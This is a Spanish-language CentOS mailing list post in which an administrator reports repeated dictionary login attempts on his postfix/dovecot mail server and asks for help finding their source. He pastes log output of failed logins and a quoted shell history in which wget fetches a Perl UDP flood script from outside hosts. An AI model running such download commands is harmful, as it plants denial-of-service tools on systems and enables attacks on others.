[CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot

Luis Alberto Roman Aguirre luisroman80 en hotmail.com
Jue Mar 21 15:55:31 UTC 2013


Buenos días a todos de la lista:
Primero que nada les cuento la experiencia que estoy  pasando  con mi servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado  que el  servidor a las 5:00PM  es atacado/escaneado  o  algo  asi  tratando de conectarse al  dovecot especificamente ,les posteo  lo que sale...--------------------- pam_unix Begin
------------------------ 

  dovecot:

    Authentication
Failures:

       contacto
rhost=66.142.38.137 : 88 Time(s)

       teste
rhost=66.142.38.137 : 88 Time(s)

       basura
rhost=66.142.38.137 : 65 Time(s)

       renata
rhost=66.142.38.137 : 65 Time(s)

       financeiro
rhost=66.142.38.137 : 64 Time(s)

       biblioteca
rhost=66.142.38.137 : 62 Time(s)

       bodega
rhost=66.142.38.137 : 62 Time(s)

       licita
rhost=66.142.38.137 : 62 Time(s)

       clientes
rhost=66.142.38.137 : 61 Time(s)

       contabilidad
rhost=66.142.38.137 : 59 Time(s)

       estudio
rhost=66.142.38.137 : 59 Time(s)

       mrivera
rhost=66.142.38.137 : 58 Time(s)

       patricio
rhost=66.142.38.137 : 58 Time(s)

       prueba
rhost=66.142.38.137 : 58 Time(s)

       usuario
rhost=66.142.38.137 : 58 Time(s)

       turismo
rhost=66.142.38.137 : 57 Time(s)        ..........       .................        ............(hay mas resgisto q no lo pongo  es bastante todos salen de la misma ip)        Unknown Entries:

       check pass;
user unknown: 3901 Time(s)
Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot o  bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y  donde se ejecuta, pero  si  averigue que hicieron y  que se bajaron para realizar esto.
el cual detallo, yo  uso  un Centos 6.0 64 bits, fue un usuario interno con conocimiento basicos de linux ( al menos eso creo ) se conecto  y  hizo eso, (lo saque del  history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls -awpasswd mcondeexit
El detalle es que desde ese momento ya tengo  el problema que les comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal  de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y  siempre se ejecuta a esa hora?? o  es un scaneo  externo.
Saludos
Luis Roman

 		 	   		  


Más información sobre la lista de distribución CentOS-es